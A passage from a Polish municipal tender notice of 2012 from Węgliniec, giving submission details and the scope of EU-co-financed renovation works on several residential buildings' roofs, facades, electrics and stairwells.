6.2.Zmiana danych związanych z obsługą administracyjno - organizacyjną umowy (np. zmiana numeru rachunku bankowego);
6.3.Zmiana danych teleadresowych, zmiany osób wskazanych do kontaktów między stronami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wegliniec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> -Urząd Gminy i Miasta Węgliniec, pokój nr 11, ul. Sikorskiego 3, 59 - 940 Węgliniec;
- listem poleconym - opłata 50zł na konto nr 12 8382 0001 2600 0648 3000 0010 z dopiskiem - opłata za SIWZ..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.03.2012 godzina 11:00, miejsce: Urząd Gminy i Miasta w Węglińcu ul. Sikorskiego 3 59-940 Węgliniec pok. 21(sekretariat) I piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego  w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013, Priorytet IX Odnowa zdegradowanych obszarów miejskich na terenie Dolnego Śląska (Miasta)
Działanie 9.2 Wsparcie dla przedsięwzięć w zakresie mieszkalnictwa w miastach poniżej 10 tysięcy mieszkańców.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE 1 -  Renowacja części wspólnych budynków Wspólnoty Mieszkaniowej CZWÓRKA  położonych w Węglińcu przy ul. Sikorskiego 4 i 4a.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres robót dotyczący budynku przy ul. Sikorskiego 4:
a) remont dachu - wymiana pokrycia dachowego z obróbkami - 250 m2;
b) wykonanie ocieplenia ściany północnej i południowej oraz niezbędnych obróbek okien i gzymsów  zgodnie z wytycznymi audytu energetycznego załączonego do Programu Funkcjonalno-Użytkowego (PFU) stanowiącego Załącznik Nr 1 do niniejszej specyfikacji- 280m2;
c) położenie tynku strukturalnego - 460 m2;
2. Zakres robót dotyczący budynku przy ul. Sikorskiego 4a:
a) wykonanie ocieplenia ścian w części mieszkalnej budynku oraz niezbędnych obróbek okien i gzymsów  zgodnie z wytycznymi audytu energetycznego załączonego do Programu Funkcjonalno-Użytkowego (PFU) stanowiącego Załącznik Nr 1 do niniejszej specyfikacji;
b) położenie tynku i malowanie elewacji - 350 m2;
c) wymiana stolarki okiennej na korytarzu - 1 szt. (PCV, białe)
d) wymiana stolarki drzwiowej - 1 szt. (Alu)
e) wymiana schodów na klatce schodowej,
f)przygotowanie do malowania i malowanie korytarza i klatki schodowej. 
3. Zamówienie jest realizowane w dwóch etapach: 
Etap I:
- opracowanie dokumentacji projektowej stanowiącej załącznik do Zgłoszenia robót budowlanych nie wymagających pozwolenia na budowę oraz przedłożenie jej Zamawiającemu do zatwierdzenia wraz ze szczegółowym opisem robót uwzględniającym zapisy PFU i niniejszej SIWZ w terminie 30 dni od dnia podpisania umowy
UWAGA! Budynek jest położony w strefie ochrony konserwatorskiej w związku z tym Wykonawca powinien uzgodnić sposób realizacji zadania z Wojewódzkim Urzędem Ochrony Zabytków.
- dokonanie Zgłoszenia robót budowlanych nie wymagających pozwolenia na budowę wraz z kompletem dokumentów - wzór zgłoszenia stanowi załącznik nr 3 do niniejszej specyfikacji.
Zamawiający dysponuje Wypisem i wyrysem z ustaleń miejscowego planu zagospodarowania przestrzennego oraz Mapą sytuacyjno-wysokościową w skali 1:500. 
Zamawiający dostarczy Oświadczenie o posiadanym prawie do dysponowania nieruchomością na cele budowlane.
Wartość I etapu nie może przekroczyć 4% ogólnej wartości przedmiotu zamówienia. 
Etap II - wykonanie robót budowlanych zgodnie z dokumentacją oraz warunkami określonymi w opinii ornitologicznej oraz opinii chiropterologicznej. Opinie te stanowią załącznik nr 2 do niniejszej specyfikacji. 
UWAGA! Koszty konsultacji ornitologicznej ponosi Zamawiający. Koszty konsultacji chiropterologicznej ponosi Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.40-4, 71.32.00.00-7, 45.26.10.00-4, 45.44.21.00-8, 45.42.11.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE II -  Renowacja części wspólnych budynku Wspólnoty Mieszkaniowej ul. Sikorskiego 16 w Węglińcu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres robót obejmuje:
a) remont elewacji budynku z dociepleniem zgodnie z Książką przedmiarów, stanowiącą załącznik nr 4 do niniejszej specyfikacji 
b) remont instalacji elektrycznej: demontaż starych przewodów i osprzętu, montaż rozdzielnicy licznikowej wraz z osprzętem (8 liczników, rozłącznik główny 100A, zabezpieczenia główne 63A, zabezpieczenie dla 10 obwodów), wykonanie instalacji oświetlenia klatki schodowej wraz z osprzętem (przewód 3x1,5mm2 dł. 40m; oprawy oświetleniowe wewnętrzne 6 szt.;oprawa oświetleniowa zewnętrzna z czujnikiem ruchu; wyłączniki schodowe 7 szt.), wykonanie instalacji oświetlenia piwnic i strychu wraz z osprzętem (przewód 3x1,5mm2 dł. 30m; oprawy oświetleniowe wewnętrzne 4 szt.; wyłączniki podtynkowe 2 szt.)
c) wymiana drzwi zewnętrznych - 2 szt. 
d) wymiana zewnętrznej stolarki okiennej klatki schodowej - 2 szt. (1,45x1,3m)
e) malowanie klatki schodowej: częściowe skucie i uzupełnienie starych tynków (25m2), wykonanie tynków gipsowych na ścianach i suficie (350m2), malowanie ścian i sufitów farbą emulsyjną (275m2), malowanie lamperii (75m2), schodów, biegów i balustrad drewnianych farbą olejną (78m2), naprawa betonowych podestów i ułożenie płytek ceramicznych (15m2)
f) zamurowanie otworu o pow. 2,16 m2 pustakami gazo-betonowymi
2. Zamówienie jest realizowane w dwóch etapach: 
Etap I:	
- opracowanie dokumentacji projektowej stanowiącej załącznik do Zgłoszenia robót budowlanych nie wymagających pozwolenia na budowę oraz przedłożenie jej Zamawiającemu do zatwierdzenia wraz ze szczegółowym opisem robót uwzględniającym zapisy PFU i niniejszej SIWZ w terminie 30 dni od dnia podpisania umowy
UWAGA! Budynek jest wpisany do ewidencji zabytków w związku z tym Wykonawca powinien uzgodnić sposób realizacji zadania z Wojewódzkim Urzędem Ochrony Zabytków.
- dokonanie Zgłoszenia robót budowlanych nie wymagających pozwolenia na budowę wraz z kompletem dokumentów - wzór zgłoszenia stanowi załącznik nr 3 do niniejszej specyfikacji.
Zamawiający dysponuje Wypisem i wyrysem z ustaleń miejscowego planu zagospodarowania przestrzennego oraz Mapą sytuacyjno-wysokościową w skali 1:500. 
Zamawiający dostarczy Oświadczenie o posiadanym prawie do dysponowania nieruchomością na cele budowlane.
Wartość I etapu nie może przekroczyć 4% ogólnej wartości przedmiotu zamówienia. 
Etap II - wykonanie robót budowlanych zgodnie z dokumentacją oraz warunkami określonymi w opinii ornitologicznej oraz opinii chiropterologicznej. Opinie te stanowią załącznik nr 2 do niniejszej specyfikacji. 
UWAGA! Koszty konsultacji ornitologicznej ponosi Zamawiający. Koszty konsultacji chiropterologicznej ponosi Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.40-4, 71.32.00.00-7, 45.44.21.00-8, 45.31.12.00-2, 45.42.11.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE III -  Renowacja części wspólnych budynku Wspólnoty Mieszkaniowej Węgliniec ul. Sikorskiego 30 w Węglińcu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres robót obejmuje:
a) odnowienie dachu z wymianą pokrycia połaci dachowej (184,6m2): rozbiórka pokrycia z dachówki karpiówki, rozebranie łat, rozebranie  rynien i rur spustowych z blachy nie nadającej się do użytku, przemurowanie przewodów kominowych i wentylacyjnych, obróbki blacharskie, łacenie i pokrycie dachu dachówką karpiówką, uzupełnienie włazów kominowych, płotek przeciwśniegowy, montaż rynien i rur spustowych z blachy ocynkowanej
b) remont elewacji budynku z dociepleniem(272m2): gruntowanie, ocieplenie ścian płytami styropianowymi klejonymi do podłoża wraz z wykonaniem wyprawy elewacyjnej wraz z obróbkami okien i gzymsów, zgodnie z wytycznymi audytu energetycznego załączonego do Programu Funkcjonalno-Użytkowego (PFU) stanowiącego Załącznik Nr 1 do niniejszej specyfikacji, dwukrotne malowanie farbami akrylowymi. Elewację od strony północnej należy wyłączyć z docieplenia - podlegać będzie ona jedynie odnowieniu z zachowaniem istniejących elementów zdobniczych. W PFU przewidziano omyłkowo prace elewacyjne łącznika między budynkami przy ul. Sikorskiego 28 i 30. Łącznik ten nie stanowi części nieruchomości przy ul. Sikorskiego 30.  
b) remont instalacji elektrycznej: wymiana tablic rozdzielczych, demontaż starych przewodów i osprzętu, montaż rozdzielnicy licznikowej wraz z osprzętem, wykonanie instalacji oświetlenia klatki schodowej wraz z osprzętem (9 szt.),
c) instalacja alarmowa i sygnalizacyjna - domofon (1 kpl.)
d) wymiana drzwi zewnętrznych - 1 szt. 
e) odnowienie klatki schodowej: częściowe skucie i uzupełnienie starych tynków, gruntowanie powierzchni wewnętrznych, dwukrotne malowanie ścian i sufitów farbą emulsyjną, dwukrotne malowanie lamperii farbą olejną, naprawa schodów i posadzek oraz jednokrotne malowanie schodów drewnianych farbą olejną, 
2. Zamówienie jest realizowane w dwóch etapach: 
Etap I:	
- opracowanie dokumentacji projektowej stanowiącej załącznik do Zgłoszenia robót budowlanych nie wymagających pozwolenia na budowę oraz przedłożenie jej Zamawiającemu do zatwierdzenia wraz ze szczegółowym opisem robót uwzględniającym zapisy PFU i niniejszej SIWZ w terminie 30 dni od dnia podpisania umowy
UWAGA! Budynek jest wpisany do ewidencji zabytków w związku z tym Wykonawca powinien uzgodnić sposób realizacji zadania z Wojewódzkim Urzędem Ochrony Zabytków.
- dokonanie Zgłoszenia robót budowlanych nie wymagających pozwolenia na budowę wraz z kompletem dokumentów - wzór zgłoszenia stanowi załącznik nr 3 do niniejszej specyfikacji.
Zamawiający dysponuje Wypisem i wyrysem z ustaleń miejscowego planu zagospodarowania przestrzennego oraz Mapą sytuacyjno-wysokościową w skali 1:500. 
Zamawiający dostarczy Oświadczenie o posiadanym prawie do dysponowania nieruchomością na cele budowlane.
Wartość I etapu nie może przekroczyć 4% ogólnej wartości przedmiotu zamówienia. 
Etap II - wykonanie robót budowlanych zgodnie z dokumentacją oraz warunkami określonymi w opinii ornitologicznej oraz opinii chiropterologicznej. Opinie te stanowią załącznik nr 2 do niniejszej specyfikacji. 
UWAGA! Koszty konsultacji ornitologicznej ponosi Zamawiający. Koszty konsultacji chiropterologicznej ponosi Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.40-4, 71.32.00.00-7, 45.26.10.00-4, 45.31.12.00-2, 45.42.11.00-5, 45.44.21.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ZADANIE IV -  Renowacja części wspólnych budynku Wspólnoty Mieszkaniowej ul. Sikorskiego 32 w Węglińcu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres robót obejmuje:
a) remont elewacji budynku z dociepleniem: uzupełnienie tynków zewnętrznych zwykłych kat. II (100m2), przygotowanie starego podłoża pod ocieplenie metodą lekkomokrą (340m2), docieplenie ścian z cegły płytami styropianowymi klejonymi do podłoża (340m2), wykonanie wyprawy elewacyjnej akrylowej wraz z obróbkami okien i gzymsów, zgodnie z wytycznymi audytu energetycznego załączonego do Programu Funkcjonalno-Użytkowego (PFU) stanowiącego Załącznik Nr 1 do niniejszej specyfikacji;
b) remont instalacji elektrycznej: wymiana tablic rozdzielczych, demontaż starych przewodów i osprzętu, montaż przewodu zasilającego budynek od izolatorów linii napowietrznej YKY 5x16mm2 dł 25m, montaż rozdzielnicy licznikowej wraz z osprzętem, wykonanie instalacji oświetlenia klatki schodowej wraz z osprzętem (oprawy oświetleniowe wewnętrzne - 4 szt.; oprawa oświetleniowa zewnętrzna z czujnikiem ruchu - 1 szt.; wyłączniki schodowe 5 szt.), wykonanie instalacji oświetlenia piwnic i strychu wraz z osprzętem (przewód 3x1,5mm2 - 30m; oprawy oświetleniowe - 4 szt.; wyłączniki podtynkowe - 2 szt,)
c) wymiana drzwi zewnętrznych - 1 szt. 
d) wymiana zewnętrznej stolarki okiennej klatki schodowej - 2 szt. (1x1,7m) 
e) odnowienie klatki schodowej: częściowe skucie i uzupełnienie starych tynków (30m2), wykonanie tynków gipsowych na ścianach i suficie (260m2), malowanie ścian i sufitów farbą emulsyjną (183m2), malowanie lamperii i balustrad farbą olejną (91m2), wykładzina PCV na schodach i podestach drewnianych (30m2), naprawa podestów betonowych i ułożenie płytek ceramicznych (20m2)
f) remont instalacji wodnej i kanalizacyjnej: wymiana rur wodnych stalowych na miedziane fi 28mm - dł. 35m, wymiana rur kanalizacyjnych żeliwnych na PCV fi 110mm - dł. 35m
2. Zamówienie jest realizowane w dwóch etapach: 
Etap I:	
- opracowanie dokumentacji projektowej stanowiącej załącznik do Zgłoszenia robót budowlanych nie wymagających pozwolenia na budowę oraz przedłożenie jej Zamawiającemu do zatwierdzenia wraz ze szczegółowym opisem robót uwzględniającym zapisy PFU i niniejszej SIWZ w terminie 30 dni od dnia podpisania umowy
UWAGA! Budynek jest wpisany do ewidencji zabytków w związku z tym Wykonawca powinien uzgodnić sposób realizacji zadania z Wojewódzkim Urzędem Ochrony Zabytków.
- dokonanie Zgłoszenia robót budowlanych nie wymagających pozwolenia na budowę wraz z kompletem dokumentów - wzór zgłoszenia stanowi załącznik nr 3 do niniejszej specyfikacji.
Zamawiający dysponuje Wypisem i wyrysem z ustaleń miejscowego planu zagospodarowania przestrzennego oraz Mapą sytuacyjno-wysokościową w skali 1:500. 
Zamawiający dostarczy Oświadczenie o posiadanym prawie do dysponowania nieruchomością na cele budowlane.
Wartość I etapu nie może przekroczyć 4% ogólnej wartości przedmiotu zamówienia. 
Etap II - wykonanie robót budowlanych zgodnie z dokumentacją oraz warunkami określonymi w opinii ornitologicznej oraz opinii chiropterologicznej. Opinie te stanowią załącznik nr 2 do niniejszej specyfikacji. 
UWAGA! Koszty konsultacji ornitologicznej ponosi Zamawiający. Koszty konsultacji chiropterologicznej ponosi Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.40-4, 71.32.00.00-7, 45.31.12.00-2, 45.42.11.00-5, 45.33.00.00-9, 45.44.21.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ZADANIE V -  Renowacja części wspólnych budynku Wspólnoty Mieszkaniowej Węgliniec  Sikorskiego 36 w Węglińcu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres robót obejmuje:
a) remont elewacji budynku z dociepleniem zgodnie z przedmiarem stanowiącym załącznik nr 4 do niniejszej specyfikacji 
b) modernizacja instalacji elektrycznej w częściach wspólnych zgodnie z przedmiarem stanowiącym załącznik nr 4 do niniejszej specyfikacji 
c) odnowienie klatki schodowej zgodnie z przedmiarem stanowiącym załącznik nr 4 do niniejszej specyfikacji 
2. Zamówienie jest realizowane w dwóch etapach: 
Etap I:	
- opracowanie dokumentacji projektowej stanowiącej załącznik do Zgłoszenia robót budowlanych nie wymagających pozwolenia na budowę oraz przedłożenie jej Zamawiającemu do zatwierdzenia wraz ze szczegółowym opisem robót uwzględniającym zapisy PFU i niniejszej SIWZ w terminie 30 dni od dnia podpisania umowy
UWAGA! Budynek jest położony w strefie ochrony konserwatorskiej w związku z tym Wykonawca powinien uzgodnić sposób realizacji zadania z Wojewódzkim Urzędem Ochrony Zabytków.
- dokonanie Zgłoszenia robót budowlanych nie wymagających pozwolenia na budowę wraz z kompletem dokumentów - wzór zgłoszenia stanowi załącznik nr 3 do niniejszej specyfikacji.
Zamawiający dysponuje Wypisem i wyrysem z ustaleń miejscowego planu zagospodarowania przestrzennego oraz Mapą sytuacyjno-wysokościową w skali 1:500. 
Zamawiający dostarczy Oświadczenie o posiadanym prawie do dysponowania nieruchomością na cele budowlane.
Wartość I etapu nie może przekroczyć 4% ogólnej wartości przedmiotu zamówienia. 
Etap II - wykonanie robót budowlanych zgodnie z dokumentacją oraz warunkami określonymi w opinii ornitologicznej oraz opinii chiropterologicznej. Opinie te stanowią załącznik nr 2 do niniejszej specyfikacji. 
UWAGA! Koszty konsultacji ornitologicznej ponosi Zamawiający. Koszty konsultacji chiropterologicznej ponosi Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.40-4, 71.32.00.00-7, 45.31.12.00-2, 45.44.21.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> ZADANIE VI -  Renowacja części wspólnych budynku Wspólnoty Mieszkaniowej ul. Sikorskiego 42 Węgliniec.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres robót obejmuje:
a) odnowienie dachu z wymianą pokrycia połaci dachowej (293m2): rozbiórka pokrycia z dachówki karpiówki, rozebranie łat, rozebranie  rynien i rur spustowych z blachy nie nadającej się do użytku, przemurowanie przewodów kominowych i wentylacyjnych, obróbki blacharskie, łacenie i pokrycie dachu dachówką karpiówką, uzupełnienie włazów kominowych, płotek przeciwśniegowy (36m), montaż rynien i rur spustowych z blachy ocynkowanej (118m), montaż zbiorniczków przy rynnach (4szt.)
b) remont elewacji budynku z dociepleniem (456m2): gruntowanie, ocieplenie ścian płytami styropianowymi klejonymi do podłoża wraz z wykonaniem wyprawy elewacyjnej wraz z obróbkami okien i gzymsów, zgodnie z wytycznymi audytu energetycznego załączonego do Programu Funkcjonalno-Użytkowego (PFU) stanowiącego Załącznik Nr 1 do niniejszej specyfikacji, dwukrotne malowanie farbami akrylowymi
c) remont instalacji elektrycznej: wymiana tablic rozdzielczych, demontaż starych przewodów i osprzętu, montaż rozdzielnicy licznikowej wraz z osprzętem, wykonanie instalacji oświetlenia klatki schodowej wraz z osprzętem ,
d) instalacja alarmowa i sygnalizacyjna - domofon (1 kpl.)
e) wymiana drzwi zewnętrznych - 2 szt. (wymiar 1,10x2,13m) 
f) wymiana zewnętrznej stolarki okiennej klatki schodowej - 2 szt. (wymiar 1,60x1,03)
g) odnowienie klatki schodowej: częściowe skucie i uzupełnienie starych tynków, gruntowanie powierzchni wewnętrznych, dwukrotne malowanie ścian i sufitów farbą emulsyjną, dwukrotne malowanie lamperii farbą olejną, naprawa schodów i posadzek oraz jednokrotne malowanie schodów drewnianych farbą olejną, 
2. Zamówienie jest realizowane w dwóch etapach: 
Etap I:	
- opracowanie dokumentacji projektowej stanowiącej załącznik do Zgłoszenia robót budowlanych nie wymagających pozwolenia na budowę oraz przedłożenie jej Zamawiającemu do zatwierdzenia wraz ze szczegółowym opisem robót uwzględniającym zapisy PFU i niniejszej SIWZ w terminie 30 dni od dnia podpisania umowy
UWAGA! Budynek jest położony w strefie ochrony konserwatorskiej w związku z tym Wykonawca powinien uzgodnić sposób realizacji zadania z Wojewódzkim Urzędem Ochrony Zabytków.
- dokonanie Zgłoszenia robót budowlanych nie wymagających pozwolenia na budowę wraz z kompletem dokumentów - wzór zgłoszenia stanowi załącznik nr 3 do niniejszej specyfikacji.
Zamawiający dysponuje Wypisem i wyrysem z ustaleń miejscowego planu zagospodarowania przestrzennego oraz Mapą sytuacyjno-wysokościową w skali 1:500. 
Zamawiający dostarczy Oświadczenie o posiadanym prawie do dysponowania nieruchomością na cele budowlane.
Wartość I etapu nie może przekroczyć 4% ogólnej wartości przedmiotu zamówienia. 
Etap II - wykonanie robót budowlanych zgodnie z dokumentacją oraz warunkami określonymi w opinii ornitologicznej oraz opinii chiropterologicznej. Opinie te stanowią załącznik nr 2 do niniejszej specyfikacji. 
UWAGA! Koszty konsultacji ornitologicznej ponosi Zamawiający. Koszty konsultacji chiropterologicznej ponosi Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.40-4, 71.32.00.00-7, 45.26.10.00-4, 45.31.12.00-2, 45.42.11.00-5, 45.44.21.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> ZADANIE VII. Renowacja części wspólnych budynku Wspólnoty Mieszkaniowej ul. Karola Wojtyły 7 w Węglińcu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres robót obejmuje:
a) remont dachu: rozebranie starych przewodów dymowych i wentylacyjnych do powierzchni dachu oraz wymurowanie nowych z cegły klinkierowej (6,8m3),  wymiana instalacji odgromowej (40m), pokrycie dachu papą termozgrzewalna - 1 warstwa (187m2) 
b) remont elewacji budynku z dociepleniem: przygotowanie starego podłoża pod ocieplenie metodą lekkomokrą (190m2), docieplenie ścian z cegły płytami styropianowymi klejonymi do podłoża (190m2), montaż parapetów zewnętrznych z PCV (41m) wykonanie wyprawy elewacyjnej akrylowej barwionej wraz z obróbkami okien i gzymsów (165m2), wykonanie wyprawy elewacyjnej cokołów tynkiem żywicznym (25m),  zgodnie z wytycznymi audytu energetycznego załączonego do Programu Funkcjonalno-Użytkowego (PFU) stanowiącego Załącznik Nr 1 do niniejszej specyfikacji;
c) remont instalacji domofonowej - zastąpienie starego osprzętu nowym bez wymiany przewodów, 
d) wymiana drzwi zewnętrznych - 2 szt.( wymiary- 1,5x2,6m oraz 1,5x2,3m) 
e) wymiana zewnętrznej stolarki okiennej klatki schodowej - 3 szt. (wymiar 1,5x1,4m) 
2. Zamówienie jest realizowane w dwóch etapach: 
Etap I:	
- opracowanie dokumentacji projektowej stanowiącej załącznik do Zgłoszenia robót budowlanych nie wymagających pozwolenia na budowę oraz przedłożenie jej Zamawiającemu do zatwierdzenia wraz ze szczegółowym opisem robót uwzględniającym zapisy PFU i niniejszej SIWZ w terminie 30 dni od dnia podpisania umowy
UWAGA! Budynek jest położony w strefie ochrony konserwatorskiej w związku z tym Wykonawca powinien uzgodnić sposób realizacji zadania z Wojewódzkim Urzędem Ochrony Zabytków.
- dokonanie Zgłoszenia robót budowlanych nie wymagających pozwolenia na budowę wraz z kompletem dokumentów - wzór zgłoszenia stanowi załącznik nr 3 do niniejszej specyfikacji.
Zamawiający dysponuje Wypisem i wyrysem z ustaleń miejscowego planu zagospodarowania przestrzennego oraz Mapą sytuacyjno-wysokościową w skali 1:500. 
Zamawiający dostarczy Oświadczenie o posiadanym prawie do dysponowania nieruchomością na cele budowlane.
Wartość I etapu nie może przekroczyć 4% ogólnej wartości przedmiotu zamówienia. 
Etap II - wykonanie robót budowlanych zgodnie z dokumentacją oraz warunkami określonymi w opinii ornitologicznej oraz opinii chiropterologicznej. Opinie te stanowią załącznik nr 2 do niniejszej specyfikacji. 
UWAGA! Koszty konsultacji ornitologicznej ponosi Zamawiający. Koszty konsultacji chiropterologicznej ponosi Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.40-4, 71.32.00.00-7, 45.26.19.00-3, 45.42.11.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> ZADANIE VIII -  Renowacja części wspólnych budynku Wspólnoty Mieszkaniowej ul. Karola Wojtyły 13 w Węglińcu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres robót obejmuje:
a) remont elewacji budynku z dociepleniem: przygotowanie starego podłoża pod ocieplenie metodą lekkomokrą (246m2), docieplenie ścian z cegły płytami styropianowymi klejonymi do podłoża (246m2), wykonanie wyprawy elewacyjnej akrylowej wraz z obróbkami okien i gzymsów (202m2), wykonanie wyprawy elewacyjnej żywicznej cokołu (44m2) - zgodnie z wytycznymi audytu energetycznego załączonego do Programu Funkcjonalno-Użytkowego (PFU) stanowiącego Załącznik Nr 1 do niniejszej specyfikacji;
b) wymiana drzwi zewnętrznych - 1 szt. (1,3x2,0m)
c) wymiana zewnętrznej stolarki okiennej klatki schodowej - 2 szt. (1,15x1,7m) 
2. Zamówienie jest realizowane w dwóch etapach: 
Etap I:	
- opracowanie dokumentacji projektowej stanowiącej załącznik do Zgłoszenia robót budowlanych nie wymagających pozwolenia na budowę oraz przedłożenie jej Zamawiającemu do zatwierdzenia wraz ze szczegółowym opisem robót uwzględniającym zapisy PFU i niniejszej SIWZ w terminie 30 dni od dnia podpisania umowy
UWAGA! Budynek jest wpisany do ewidencji zabytków w związku z tym Wykonawca powinien uzgodnić sposób realizacji zadania z Wojewódzkim Urzędem Ochrony Zabytków.
- dokonanie Zgłoszenia robót budowlanych nie wymagających pozwolenia na budowę wraz z kompletem dokumentów - wzór zgłoszenia stanowi załącznik nr 3 do niniejszej specyfikacji.
Zamawiający dysponuje Wypisem i wyrysem z ustaleń miejscowego planu zagospodarowania przestrzennego oraz Mapą sytuacyjno-wysokościową w skali 1:500. 
Zamawiający dostarczy Oświadczenie o posiadanym prawie do dysponowania nieruchomością na cele budowlane.
Wartość I etapu nie może przekroczyć 4% ogólnej wartości przedmiotu zamówienia. 
Etap II - wykonanie robót budowlanych zgodnie z dokumentacją oraz warunkami określonymi w opinii ornitologicznej oraz opinii chiropterologicznej. Opinie te stanowią załącznik nr 2 do niniejszej specyfikacji. 
UWAGA! Koszty konsultacji ornitologicznej ponosi Zamawiający. Koszty konsultacji chiropterologicznej ponosi Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.40-4, 71.32.00.00-7, 45.42.11.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> ZADANIE IX - Renowacja części wspólnych budynku Wspólnoty Mieszkaniowej Węgliniec ul. Karola Wojtyły 27 w Węglińcu oraz Wspólnoty Mieszkaniowej K.Wojtyły 29 Węgliniec..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3.9.1. Zakres robót w budynku przy ul. K. Wojtyły 27:
a) odnowienie dachu z wymianą pokrycia połaci dachowej (284m2): rozbiórka pokrycia z dachówki karpiówki, rozebranie łat, rozebranie  rynien i rur spustowych z blachy nie nadającej się do użytku, przemurowanie przewodów kominowych i wentylacyjnych, obróbki blacharskie, łacenie i pokrycie dachu dachówką karpiówką, uzupełnienie włazów kominowych, płotek przeciwśniegowy, montaż rynien i rur spustowych z blachy ocynkowanej, montaż zbiorniczków przy rynnach
b) remont instalacji elektrycznej: wymiana tablic rozdzielczych, demontaż starych przewodów i osprzętu, montaż rozdzielnicy licznikowej wraz z osprzętem, wykonanie instalacji oświetlenia klatki schodowej wraz z osprzętem ,
c) wymiana drzwi zewnętrznych - 2 szt. 
d) wymiana zewnętrznej stolarki okiennej klatki schodowej - 2 szt. 
e) odnowienie klatki schodowej: częściowe skucie i uzupełnienie starych tynków, gruntowanie powierzchni wewnętrznych, dwukrotne malowanie ścian i sufitów farbą emulsyjną, dwukrotne malowanie lamperii farbą olejną, naprawa schodów i posadzek oraz jednokrotne malowanie schodów drewnianych farbą olejną,
